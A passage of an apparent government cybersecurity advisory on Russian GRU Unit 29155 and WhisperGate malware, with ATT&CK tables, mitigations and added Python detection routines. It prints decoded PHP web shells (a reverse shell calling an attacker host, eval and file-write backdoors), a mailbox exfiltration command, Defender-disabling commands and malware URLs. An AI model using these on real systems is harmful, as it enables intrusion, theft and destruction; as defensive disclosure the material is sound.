  2. Configuring a proxy within the victim infrastructure and executing commands within the network via ProxyChains. ProxyChains—a tool used to route internal traffic through a series of proxies [T1090.003]—has been used to provide further anonymity and to modify system configuration so that network traffic is forced through chains of SOCKS5 proxies on the respective ports. Ports used by actor infrastructure include:
    1. 1080
    2. 1333
    3. 13381
    4. 13391
    5. 13666
    6. 13871
    7. 1448
    8. 1888
    9. 3130
    10. 3140
    11. 4337
    12. 50001
    13. 8079
  3. Using the GOST open source tunneling tool (via a SOCKS5 proxy), renamed to java, as seen in the following running processes from victim incident response results:

8212 - SJ 0:02.54 HISTFILE=/dev/null PATH=/sbin:/bin:/usr/sbin:/usr/bin LD_LIBRARY_PATH=/usr/local/lib:/usr/local/lib OLDPWD=/tmp PWD=/tmp/.ICE-unix HOME=/ RC_PID=33980 ./java -L socks5://127.0.0.1:13338

8282 - IJ 0:03.98 HISTFILE=/dev/null PATH=/sbin:/bin:/usr/sbin:/usr/bin LD_LIBRARY_PATH=/usr/local/lib:/usr/local/lib OLDPWD=/tmp PWD=/tmp/.ICE-unix HOME=/ RC_PID=33980 ./java -L rtcp://0.0.0.0:13381/127.0.0.1:13338 -F socks5://{IP Address}:7896

  4. Modifying .php scripts to manipulate server-side operations, such as the observations listed in Table 2 below.
Table 2 (Script / Base64-decoded command / Purpose)

Script: /usr/local/www/apache24/data/-redacted-/plugins/extension/oomla/oomla.php
Command (Base64 decoded):

    if (isset($_POST["sessionsid_wp"]))
    {
        $poll_id = $_POST["sessionsid_wp"];
        $sessii = explode(":", base64_decode($poll_id));
        $sock = fsockopen($sessii[0], $sessii[1]);
        $proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);
    }

Purpose: Creates session.

Script: /usr/local/www/apache24/data/-redacted-/plugins/authentication/joomla/oomla.php
Command (Base64 decoded):

    function nb_res($a)
    {
        eval(system('base64_decode($a)'));
    }

Purpose: Allows program to run.

Script: /usr/local/www/apache24/data/-redacted-/plugins/privacy/contact/contact.php
Command (Base64 decoded):

    if (isset($_POST['f1']))
    {
        $f1 = $_POST['f1'];
        $f2 = $_POST['f2'];
        $content = base64_decode($f1);
        $h = fopen($f2, "w");
        $text = "$content";
        fwrite($h, $text);
        fclose($h);
    }

Purpose: Allows writing to files.
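The GOST process listing under item 3 above can be triaged mechanically from a process dump. The following Python routine is an added example, not from the advisory: it parses ps-style lines of the form PID TT STAT TIME ENV... COMMAND (the layout shown in that listing, i.e. FreeBSD ps with the environment printed), separates the leading KEY=VALUE environment tokens from the command, and scores the indicators seen there: HISTFILE=/dev/null, a working directory under a hidden /tmp path, a relative binary named java without any Java arguments, and socks5:// or rtcp:// tunnel URLs. The scoring rules are hypothetical and the sample lines are constructed with a documentation IP address.

```python
import os
import re
from typing import Dict, List

ENV_TOKEN = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")          # KEY=VALUE environment entry
TUNNEL_URL = re.compile(r"\b(?:socks5|socks4|rtcp|rudp)://\S+")  # GOST listener/forward URLs
HIDDEN_TMP_DIR = re.compile(r"^/(?:tmp|var/tmp|dev/shm)/\.")    # e.g. /tmp/.ICE-unix


def parse_ps_line(line: str) -> Dict[str, object]:
    """Split 'PID TT STAT TIME ENV... COMMAND ARGS' into pid, state, env dict and argv."""
    parts = line.split()
    if len(parts) < 5:
        raise ValueError("not a ps line with a command: %r" % line)
    pid, _tty, state, _cputime = parts[:4]
    rest = parts[4:]
    env: Dict[str, str] = {}
    i = 0
    # Leading KEY=VALUE tokens are the environment; the first other token starts the command.
    while i < len(rest) and ENV_TOKEN.match(rest[i]):
        key, val = rest[i].split("=", 1)
        env[key] = val
        i += 1
    return {"pid": int(pid), "state": state, "env": env, "argv": rest[i:]}


def triage_process(proc: Dict[str, object]) -> Dict[str, object]:
    """Apply the hypothetical rules; three or more reasons marks the process suspicious."""
    env: Dict[str, str] = proc["env"]
    argv: List[str] = proc["argv"]
    reasons: List[str] = []
    if env.get("HISTFILE") == "/dev/null":
        reasons.append("shell_history_disabled")
    if HIDDEN_TMP_DIR.match(env.get("PWD", "")):
        reasons.append("cwd_hidden_tmp_dir")
    if argv and argv[0].startswith("./"):
        reasons.append("relative_path_binary")
    tunnels = [m.group(0) for m in TUNNEL_URL.finditer(" ".join(argv))]
    if tunnels:
        reasons.append("proxy_tunnel_arguments")
    base = os.path.basename(argv[0]) if argv else ""
    java_like = any(a in ("-jar", "-cp", "-classpath") or a.endswith(".jar") for a in argv[1:])
    if base == "java" and not java_like:
        reasons.append("java_name_without_java_args")  # tunneling tool masquerading as java
    return {"pid": proc["pid"], "reasons": reasons, "tunnels": tunnels,
            "suspicious": len(reasons) >= 3}


def triage_listing(lines: List[str]) -> List[Dict[str, object]]:
    return [triage_process(parse_ps_line(line)) for line in lines if line.strip()]


# Constructed sample listing modelled on the advisory's output (203.0.113.5 is a placeholder).
SAMPLE_PS = [
    "8212 - SJ 0:02.54 HISTFILE=/dev/null PATH=/sbin:/bin:/usr/sbin:/usr/bin "
    "LD_LIBRARY_PATH=/usr/local/lib:/usr/local/lib OLDPWD=/tmp PWD=/tmp/.ICE-unix HOME=/ "
    "RC_PID=33980 ./java -L socks5://127.0.0.1:13338",
    "8282 - IJ 0:03.98 HISTFILE=/dev/null PATH=/sbin:/bin:/usr/sbin:/usr/bin "
    "LD_LIBRARY_PATH=/usr/local/lib:/usr/local/lib OLDPWD=/tmp PWD=/tmp/.ICE-unix HOME=/ "
    "RC_PID=33980 ./java -L rtcp://0.0.0.0:13381/127.0.0.1:13338 -F socks5://203.0.113.5:7896",
    "1203 - Ss 1:12.01 PATH=/sbin:/bin:/usr/sbin:/usr/bin PWD=/usr/local/app HOME=/home/app "
    "/usr/local/bin/java -jar /usr/local/app/app.jar",
]

if __name__ == "__main__":
    for result in triage_listing(SAMPLE_PS):
        print(result)
```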

Exfiltration

In several instances, analysis identified Unit 29155 cyber actors compressing victim data [T1560] (e.g., the entire filesystem, select file system artifacts or user data, and/or database dumps) to send back to their infrastructure. These cyber actors commonly use the command-line program Rclone to exfiltrate data to a remote location from victim infrastructure.

Unit 29155 cyber actors have exfiltrated Windows processes and artifacts, such as Local Security Authority Subsystem Service (LSASS) memory dumps [T1003.001], Security Accounts Manager (SAM) files [T1003.002], and SECURITY and SYSTEM event log files [T1654]. As seen in victim incident response results, actor infrastructure has also been used to compromise multiple mail servers [T1114] and exfiltrate mail artifacts, such as email messages, using PowerShell [T1059.001] via the following command:

powershell New-MailboxExportRequest -Mailbox {Mailbox} -FilePath \\{IP Address}\share\folder1.pst

MITRE ATT&CK Tactics and Techniques

See Table 3 to Table 14 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Table 3: Reconnaissance
Technique Title ID Use
Gather Victim Network Information: DNS T1590.002 Unit 29155 cyber actors have used Amass and VirusTotal to obtain information about victims’ DNS for possible use during targeting, such as subdomains for target websites.
Active Scanning T1595 Unit 29155 cyber actors use publicly available tools to gather information for possible use during targeting.
Active Scanning: Scanning IP Blocks T1595.001 Unit 29155 cyber actors use various open source scanning tools to scan for victim IP ranges.
Active Scanning: Vulnerability Scanning T1595.002 Unit 29155 cyber actors use publicly available scanning tools to enable their discovery of IoT devices and exploitable vulnerabilities. Tools leveraged for scanning include Acunetix, Amass, Droopescan, eScan, and JoomScan.
Search Open Technical Databases: Scan Databases T1596.005 Unit 29155 cyber actors use publicly available platforms like Shodan to identify internet connected hosts.
Table 4: Resource Development
Technique Title ID Use
Acquire Infrastructure: Virtual Private Server T1583.003 Unit 29155 cyber actors have used VPSs to host their operational tools, perform reconnaissance, exploit victim infrastructure, and exfiltrate victim data.
Obtain Capabilities: Malware T1588.001 Unit 29155 cyber actors obtain publicly available malware and malware loaders to support their operations. For example, analysis suggests Raspberry Robin malware may have been used in the role of an access broker.
Obtain Capabilities: Exploits T1588.005 Unit 29155 cyber actors are known to obtain CVE exploit scripts from GitHub repositories and use them against victim infrastructure.
Table 5: Initial Access
Technique Title ID Use
Valid Accounts: Default Accounts T1078.001 Unit 29155 cyber actors use exploitation scripts to authenticate to IP cameras with default usernames and passwords.
Exploit Public-Facing Application T1190 Unit 29155 cyber actors have used a variety of public exploits, including CVE-2021-33044, CVE-2021-33045, CVE-2022-26134, and CVE-2022-26138. The proof of concept exploit for CVE-2022-26134, Through the Wire, has also been used against a victim’s internet-facing Confluence server.

Table 6: Execution
Technique Title ID Use
Command and Scripting Interpreter: PowerShell T1059.001 Unit 29155 cyber actors have used PowerShell to execute commands and other operational tasks.
Table 7: Persistence
Technique Title ID Use
Server Software Component: Web Shell T1505.003 Unit 29155 cyber actors use web shells to establish persistent access to systems.
Table 8: Credential Access
Technique Title ID Use
OS Credential Dumping: LSASS Memory T1003.001 Unit 29155 cyber actors have exfiltrated LSASS memory dumps to retrieve credentials from victim machines.
OS Credential Dumping: Security Account Manager T1003.002 Unit 29155 cyber actors have exfiltrated usernames and hashed passwords from the SAM.
Brute Force: Password Spraying T1110.003 Unit 29155 cyber actors targeted victims’ Microsoft OWA infrastructure with password spraying to obtain valid usernames and passwords.
Unsecured Credentials: Credentials in Files T1552.001 Following exploitation of vulnerable IP cameras, Unit 29155 cyber actors dump configuration settings and credentials in plaintext.
Table 9: Discovery
Technique Title ID Use
Network Service Discovery T1046 Once Unit 29155 cyber actors gained access to victim internal networks, they further used Nmap (via the NSE) to write custom scripts for discovering and scanning other machines.
Log Enumeration T1654 Unit 29155 cyber actors have enumerated and exfiltrated SECURITY and SYSTEM logs.
Table 10: Lateral Movement
Technique Title ID Use
Use Alternate Authentication Material: Pass the Hash T1550.002 Unit 29155 cyber actors used Pass-the-Hash to authenticate via SMB.
Table 11: Collection
Technique Title ID Use
Email Collection T1114 Unit 29155 cyber actors have used their infrastructure to compromise multiple victims’ mail servers and exfiltrate mail artifacts, such as email messages.
Video Capture T1125 Unit 29155 cyber actors have exploited IoT devices, specifically IP cameras with default usernames and passwords, and exfiltrated images.
Data from Information Repositories: Confluence T1213.001 Unit 29155 cyber actors leveraged Through the Wire against the victim’s internet-facing Confluence server.
Archive Collected Data T1560 Unit 29155 cyber actors compress victim data (e.g., the entire filesystem, select file system artifacts or user data, and/or database dumps) to send back to their infrastructure.
Table 12: Command and Control
Technique Title ID Use
Proxy: Multi-hop Proxy T1090.003 Unit 29155 cyber actors executed commands via ProxyChains—a tool used to route internal traffic through a series of proxies. ProxyChains was also used to provide further anonymity and modify system configuration to force network traffic through chains of SOCKS5 proxies and respective ports.

Application Layer Protocol: Web Protocols T1071.001 Unit 29155 cyber actors use POST requests over HTTP to send payloads to victims.
Application Layer Protocol: DNS T1071.004 Unit 29155 cyber actors used DNS tunneling tools, such as dnscat/2 and Iodine, to tunnel IPv4 network traffic.
Non-Application Layer Protocol T1095 Unit 29155 cyber actors commonly use a reverse TCP connection to initiate communication with their infrastructure.
Ingress Tool Transfer T1105 When an exploit is successfully executed on a victim system, Unit 29155 cyber actors are known to launch the Meterpreter payload to initiate communication with their actor-controlled systems.
Protocol Tunneling T1572 Unit 29155 cyber actors have used infrastructure configured with OpenVPN to tunnel traffic over a single port (1194), as well as VPNs and GOST, to anonymize their operational activity.
Table 13: Exfiltration
Technique Title ID Use
Exfiltration Over Web Service: Exfiltration to Cloud Storage T1567.002 Unit 29155 cyber actors exfiltrated data to the cloud storage and file hosting service, MEGA (mega[.]nz), using Rclone.
Table 14: Impact
Technique Title ID Use
Data Destruction T1485 Unit 29155 cyber actors’ objectives include the destruction of data.

Mitigations

The authoring agencies recommend organizations implement the mitigations supplied below to improve organizational cybersecurity posture based on threat actor activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

Limit Adversarial Use of Common Vulnerabilities

  • Prioritize patching according to CISA’s Known Exploited Vulnerabilities Catalog, especially for the CVEs identified in this advisory, and then critical and high vulnerabilities that allow remote code execution on internet-facing devices.
  • Conduct regular automated vulnerability scans to perform vulnerability assessments on all network resources based on threat actor behaviors and known exploitable vulnerabilities (CISA CPG 1.E).
  • Limit exploitable services on internet-facing assets, such as email and remote management protocols (CISA CPGs 2.M, 2.W). Where necessary services must be exposed, such as services hosted in a demilitarized zone (DMZ), implement the appropriate compensatory controls to prevent common forms of abuse and exploitation. Disable all unnecessary operating system applications and network protocols to combat adversary enumeration. For additional guidance, see CISA Insights: Remediate Vulnerabilities for Internet-Accessible Systems.
  • U.S. organizations can utilize a range of CISA services at no cost, including vulnerability scanning and testing, to help organizations reduce exposure to threats. CISA Cyber Hygiene services can provide additional review of internet-accessible assets and provide regular reports on steps to take to mitigate vulnerabilities. Email vulnerability@cisa.dhs.gov with the subject line, “Requesting Cyber Hygiene Services,” to get started.
  • Software manufacturers, vendors, and consumers are encouraged to review CISA and NIST’s Defending Against Supply Chain Attacks. This publication provides an overview of software supply chain risks and recommendations for how software customers and vendors can use the NIST Cyber Supply Chain Risk Management (C-SCRM) Framework and the Secure Software Development Framework (SSDF) to identify, assess, and mitigate software supply chain risks. CISA recommends comprehensive mitigations for supply chain incident reporting, vulnerability disclosure (e.g., security.txt), and choosing a trusted supplier or vendor that observes proper cybersecurity hygiene (CISA CPG 1.G, 1.H, 1.I) to defend against upstream attacks.

Deploy Protective Controls and Architecture

  • Implement network segmentation. Network segmentation can help prevent lateral movement by controlling traffic flows between—and access to—various subnetworks (CISA CPG 2.F). Best practice mitigations include updating Identity and Access Management (IAM) and employing phishing-resistant MFA for all devices and accounts identified as organizational assets. For additional guidance, see CISA and NSA’s IAM Recommended Best Practices Guide for Administrators (CISA CPG 2.H).
  • Verify and ensure that sensitive data, including credentials, are not stored in plaintext and can only be accessed by authenticated and authorized users. Credentials must be stored in a secure manner, such as with a credential/password manager to protect from malicious enumeration (CISA CPG 2.L).
  • Disable and/or restrict use of command line and PowerShell activity. Update to the latest version and uninstall all earlier PowerShell versions (CISA CPG 2.N).
  • Implement a continuous system monitoring program, such as security information and event management (SIEM) or endpoint detection and response (EDR) solutions, to comprehensively log and review all authorized external access connections. This logging will better ensure the prompt detection of misuse or abnormal activity (CISA CPG 2.T).
  • Monitor for unauthorized access attempts and programming anomalies through comprehensive logging that is secured from modification, such as limiting permissions and adding redundant remote logging (CISA CPG 2.U). Security appliances should be set to detect and/or block Impacket framework indicators, PSExec or WMI commands, and suspicious PowerShell commands for timely identification and remediation.
  • Identify any use of outdated or weak encryption, update these to sufficiently strong algorithms, and consider the implications of post-quantum cryptography (CISA CPG 2.K). Use properly configured and up-to-date Secure Sockets Layer (SSL)/Transport Layer Security (TLS) to protect data in transit.

Security Controls

In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Table 3 to Table 14).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

Resources

References

  1. Microsoft Threat Intelligence Center: Destructive Malware Targeting Ukrainian Organizations
  2. Microsoft Threat Intelligence Center: Cadet Blizzard Emerges as a Novel and Distinct Russian Threat Actor
  3. CrowdStrike: EMBER BEAR Threat Actor Profile
  4. Mandiant Threat Intelligence: Responses to Russia’s Invasion of Ukraine Likely to Spur Retaliation 
  5. SentinelOne: Threat Actor UAC-0056 Targeting Ukraine with Fake Translation Software
  6. Introduction to Acunetix
  7. GitHub: OWASP Amass
  8. Kali Linux Tutorials: Droopescan
  9. GitHub: OWASP JoomScan
  10. Kali.org: MASSCAN
  11. DigitalOcean: How To Use Netcat to Establish and Test TCP and UDP Connections
  12. Shodan: What is Shodan?
  13. VirusTotal: How it Works
  14. GitHub: Through the Wire
  15. Confluence Security Advisory: Confluence Server and Data Center – CVE-2022-26134
  16. Microsoft: Security Bulletin MS17-010
  17. Avast: What is EternalBlue and Why is the MS17-010 Exploit Still Relevant?
  18. Palo Alto Networks Unit 42: Threat Brief – Ongoing Russia and Ukraine Cyber Activity
  19. CERT-UA#3799 Report
  20. Bellingcat: Attack on Ukrainian Government Websites Linked to GRU Hackers
  21. Trend Micro: Cyberattacks are Prominent in the Russia-Ukraine Conflict

Contact Information

To report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory, contact your local FBI field office or CISA’s 24/7 Operations Center at Report@cisa.gov or (888) 282-0870. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov.

Disclaimer

The information in this report is being provided “as is” for informational purposes only. CISA and the authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and the authoring agencies.

Version History

September 5, 2024: Initial version.

Appendix A: WhisperGate Malware Analysis

Overview

This technical analysis details the WhisperGate malware deployed against Ukraine; samples were collected from one victim and analyzed. The analysis provides insight into Unit 29155 cyber actor infrastructure used for network scanning, password compromising, and data exfiltration against Ukraine, NATO members in Europe and North America, and countries in Latin America and Central Asia.

Unit 29155 cyber actors’ use of WhisperGate involved the deployment of the malware files stage1.exe and stage2.exe. WhisperGate has two stages that corrupt a system’s master boot record, display a fake ransomware note, and encrypt files based on certain file extensions (see AA22-057A). The actors used multiple Discord accounts to store malware files, including what appear to be development versions or iterations of the binaries. Discord is commonly leveraged by threat actors as an endpoint for malware distribution and control; in this case, it was used to obtain the next step of the infection chain by directly sharing files through its platform. In the case of stage2.exe, the binary communicated with Discord to obtain Tbopbh.jpg—the malicious payload that is loaded in memory and performs the destructive capabilities.[18]

Categorization

The Discord accounts associated with the WhisperGate campaign are categorized into three main clusters, labeled below as Clusters 1, 2, and 3. All clusters used Discord as a staging environment for malware deployment. These groupings are based on analysis of threat actor IP addresses and the nature of the malware that existed within the accounts. The following sections include notable details found within each cluster.

Cluster 1

Cluster 1 contained the following files:

  • hxxps://cdn.discordapp[.]com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg (a resource, e.g., payload, for stage2.exe)[18]
  • saint.exe (a downloader, SaintBot, as detailed by CERT-UA)[19]
  • puttyjejfrwu.exe[19]

Cluster 2

Cluster 2 contained:

  • hxxps://cdn.discordapp[.]com/attachments/888408190625128461/895633952247799858/n.lashevychdirekcy.atom.gov.ua.zip (means for sending malware in over 35 different zip files via Discord links)[20]
  • Several Microsoft Word documents with macros that download test01.exe from 3237.site. Once executed, test01.exe downloads load2022.exe from smm2021.net.

Cluster 3

Cluster 3 contained:

  • hxxps://cdn.discordapp[.]com/attachments/945968593030496269/945970446149509130/Client.exe (Note: Unit 29155 cyber actors’ use of Client.exe was confirmed as linked to the activity, but the file was not obtained for analysis and functionality cannot be confirmed.) 
  • asd.exe (likely a development version of stage1.exe)

Behavioral Analysis

Two Windows Portable Executable (PE) files (stage1.exe and stage2.exe) were obtained from the Ukrainian victim for analysis. One PE file (asd.exe) was obtained from a U.S. victim.

stage1.exe

stage1.exe was obtained from the C: path of the Ukrainian victim’s Windows machine. stage1.exe executes when the infected device is powered down, overwriting the master boot record (MBR) and preventing the system from booting normally. Table 15 lists the hashes and properties attributed to stage1.exe.

Table 15: stage1.exe Properties
MD5 5d5c99a08a7d927346ca2dafa7973fc1
SHA-256 a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92
Compiler MinGW(GCC: (GNU) 6.3.0)[-]
Linker GNU linker ld (GNU Binutils)(2.28)[GUI32]
TimeDateStamp 2022-01-10 05:37:18
Execution Message Your hard drive has been corrupted. In case you want to recover all hard drives of your organization, You should pay us $10k via bitcoin wallet 1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv and send message via tox ID 8BEDC411012A33BA34F49130D0F186993C6A32DAD8976F6A5D82C1ED23054C057ECED5496F65 with your organization name. We will contact you to give further instructions.
Table 16: asd.exe Properties
MD5 eac0ae655d344c25ff467a929790885c
SHA-256 b9e64b58d7746cb1d3bed20405ef34d097af08c809d8dad10b9296b0bebb2b0b
Compiler MinGW(GCC: (GNU) 6.3.0)[-]
Linker GNU linker ld (GNU Binutils)(2.28)[Console32,console]
TimeDateStamp 1969-12-31 19:00:00

asd.exe is likely a development version of stage1.exe. While the behavior of asd.exe is similar to stage1.exe, the messages displayed were different.

stage2.exe

stage2.exe was obtained from the C: path of the Ukrainian victim’s Windows machine. Table 17 lists the hashes and properties attributed to stage2.exe.

Table 17: stage2.exe Properties
MD5 764f691b2168e8b3b6f9fb6582e2f819
SHA-256 aa79afbf82b06cda268664b7c83900d8f7a33e0f0071facba0b3d8f7a68ce56a
Library .NET(v4.0.30319)[-]
Linker Microsoft Linker(6.0)(GUI32,signed)
TimeDateStamp 2022-01-10 09:39:54

Table 18 lists, in chronological order, the observations made when stage2.exe executes.

Table 18: stage2.exe Behavioral Analysis Observations
Event: PowerShell command executed twice
Victim Observation: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==

Event: Base64 UTF-16LE string decoded
Victim Observation: Start-Sleep -s 10

Event: HTTP GET request sent to Discord URL to download Tbopbh.jpg
Victim Observation: hxxp://cdn.discordapp.com/attachments/928503440139771947/930108637681184768/Tbopbh[.]jpg

Event: Nmddfrqqrbyjeygggda.vbs created and executed within the %TEMP% directory
Victim Observation: The Visual Basic Script (VBS) file contained the following command:

CreateObject("WScript.Shell").Run "powershell Set-MpPreference -ExclusionPath 'C:\'", 0, False

Event: AdvancedRun.exe created and executed twice
Victim Observation:

"C:\Users\{Username}\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run

"C:\Users\{Username}\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run

Event: InstallUtil.exe created and executed; files corrupted following execution
Victim Observation: C:\Users\{Username}\AppData\Local\Temp\InstallUtil.exe
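The PowerShell activity in Table 18 and the New-MailboxExportRequest export described under Exfiltration can both be triaged from process-creation command lines. The following Python routine is an added example, not code from the advisory: it decodes -enc base64 UTF-16LE payloads the way the table's second row does, then matches hypothetical rules for Defender tampering (exclusion path, service stop, directory removal), AdvancedRun launched from a Temp directory, and mailbox exports to a UNC path; the sample command lines are constructed, with a TEST-NET address in place of the actor share.

```python
import base64
import re
from typing import Dict, List, Optional

# -enc / -EncodedCommand / -ec / -e followed by a base64 blob (longest alternative first).
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/]{8,}={0,2})", re.IGNORECASE)

# Hypothetical detection rules modelled on the observations above (not CISA signatures).
RULES = {
    "defender_exclusion_added": re.compile(r"Set-MpPreference\s+-ExclusionPath", re.IGNORECASE),
    "defender_service_stop": re.compile(r"\bsc(?:\.exe)?\b.*\bstop\s+WinDefend\b", re.IGNORECASE),
    "defender_dir_removal": re.compile(r"\b(?:rmdir|rd|Remove-Item|rm)\b.*Windows Defender", re.IGNORECASE),
    "mailbox_export_to_unc": re.compile(r"New-MailboxExportRequest\b.*-FilePath\s+[`'\"]?\\\\", re.IGNORECASE),
    "advancedrun_from_temp": re.compile(r"\\Temp\\AdvancedRun\.exe", re.IGNORECASE),
    "encoded_command": ENCODED_ARG,
}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE text behind a PowerShell -enc argument, or None if absent/invalid."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline: str) -> Dict[str, object]:
    """Match the rules against the raw line and, when present, the decoded -enc payload."""
    decoded = decode_encoded_command(cmdline)
    texts = [cmdline] + ([decoded] if decoded else [])
    indicators: List[str] = [name for name, rx in RULES.items() if any(rx.search(t) for t in texts)]
    # An encoded command on its own is only context; the other rules mark real tampering.
    return {"decoded": decoded, "indicators": indicators,
            "suspicious": bool(set(indicators) - {"encoded_command"})}


# Constructed sample command lines in the shape of the observations above.
SAMPLE_CMDLINES = [
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -enc '
    'UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==',
    'powershell New-MailboxExportRequest -Mailbox jdoe -FilePath \\\\192.0.2.20\\share\\folder1.pst',
    '"C:\\Users\\jdoe\\AppData\\Local\\Temp\\AdvancedRun.exe" /EXEFilename "C:\\Windows\\System32\\sc.exe" '
    '/WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run',
    '"C:\\Users\\jdoe\\AppData\\Local\\Temp\\AdvancedRun.exe" /EXEFilename '
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" /WindowState 0 '
    '/CommandLine "rmdir \'C:\\ProgramData\\Microsoft\\Windows Defender\' -Recurse" /StartDirectory "" /RunAs 8 /Run',
    'powershell Get-Process -Name explorer',
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(triage(line))
```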

Static Analysis

Static analysis was further conducted on two files (stage2.exe, Tbopbh.jpg) to uncover additional malware functionality and attributes.

stage2.exe

Static analysis was performed on a variant of stage2.exe; its hashes and properties are listed in Table 19 below. Of note, the MD5 and SHA-256 hash values were different than those obtained from the Ukrainian victim machine (listed above in Table 17). Behavioral analysis was also performed on the below variant and both files exhibited the same behavior.

Table 19: stage2.exe Variant Properties
MD5 14c8482f302b5e81e3fa1b18a509289d
SHA-256 dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78
Library .NET(v4.0.30319)[-]
Linker Microsoft Linker(6.0)(GUI32,signed)
TimeDateStamp 2022-01-10 09:39:54

This variant of stage2.exe contained multiple layers of execution:

  • stage2.exe contained a WebClient object that was initialized with Discord URL hxxps://cdn.discordapp.com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg to obtain the payload Tbopbh.jpg.
  • stage2.exe contained logic to reverse file bytes of a file using the Array’s Reverse method.
  • stage2.exe contained logic to load an Assembly object into a Stream object.
  • stage2.exe used the reflection library to call method Ylfwdwgmpilzyaph from the loaded Assembly object.
  • stage2.exe contained decryption logic that resembled RC4. A C# class produced a base64 string, and an encryption class derived its key from the decoded string; that class applied its decryption routine every 32 bytes, with the XOR step using the initialized byte array shown below. The base64 string came from a class containing EazFuscator logic that obfuscates code by flattening control flow and making symbols difficult to analyze:
    • byte[] array = new byte[] {148, 68, 208, 52, 241, 93, 195, 220};
  • stage2.exe contained EazFuscator class logic. This included logic that built strings during runtime; otherwise, the full strings would have been obfuscated and further segmented when viewed statically. The following is an example of a built string:
    • UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==
  • When the above string was base64 decoded (as UTF-16LE), it yielded the following PowerShell command: Start-Sleep -s 10
  • stage2.exe served as the downloader and driver logic for the malware payload, Tbopbh.jpg.

Tbopbh.jpg (payload for stage2.exe variant)

An account in Discord Cluster 1 contained malware with the following hashes, labeled as Tbopbh.jpg:

  • MD5: b3370eb3c5ef6c536195b3bea0120929
  • SHA-256: 923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6

When viewing payload Tbopbh.jpg using a hex editor, it ended with value “ZM” or hex values “5A 4D”—this indicated the payload was a reversed PE. Reversing the bytes of Tbopbh.jpg revealed the hashes of the resulting payload listed in Table 20 below.
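The byte-reversal and string-decoding steps above, as an added Python triage example (not code from the advisory or from the malware): it recognizes a blob staged in reversed byte order by its trailing "ZM", restores and validates the MZ/PE header, and decodes the base64 UTF-16LE string that stage2.exe builds at run time. The minimal PE stub it checks is constructed for the demonstration.

```python
"""Triage helpers for the stage2.exe / Tbopbh.jpg pattern (added example).

A reversed PE ends with 'ZM' (0x5A 0x4D) because the original starts with the
MZ header; undoing Array.Reverse() restores a loadable image. The base64
UTF-16LE strings are the PowerShell -EncodedCommand convention.
"""
import base64
import struct

MZ_MAGIC = b"MZ"
PE_SIGNATURE = b"PE\0\0"


def is_reversed_pe(blob: bytes) -> bool:
    """True when the blob ends with 'ZM', i.e. an MZ header read backwards."""
    return len(blob) >= 2 and blob[-2:] == b"ZM"


def looks_like_pe(data: bytes) -> bool:
    """Check the MZ magic and that e_lfanew (offset 0x3C) points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != MZ_MAGIC:
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == PE_SIGNATURE


def restore_reversed_pe(blob: bytes) -> bytes:
    """Undo the byte reversal applied by the loader and validate the result."""
    if not is_reversed_pe(blob):
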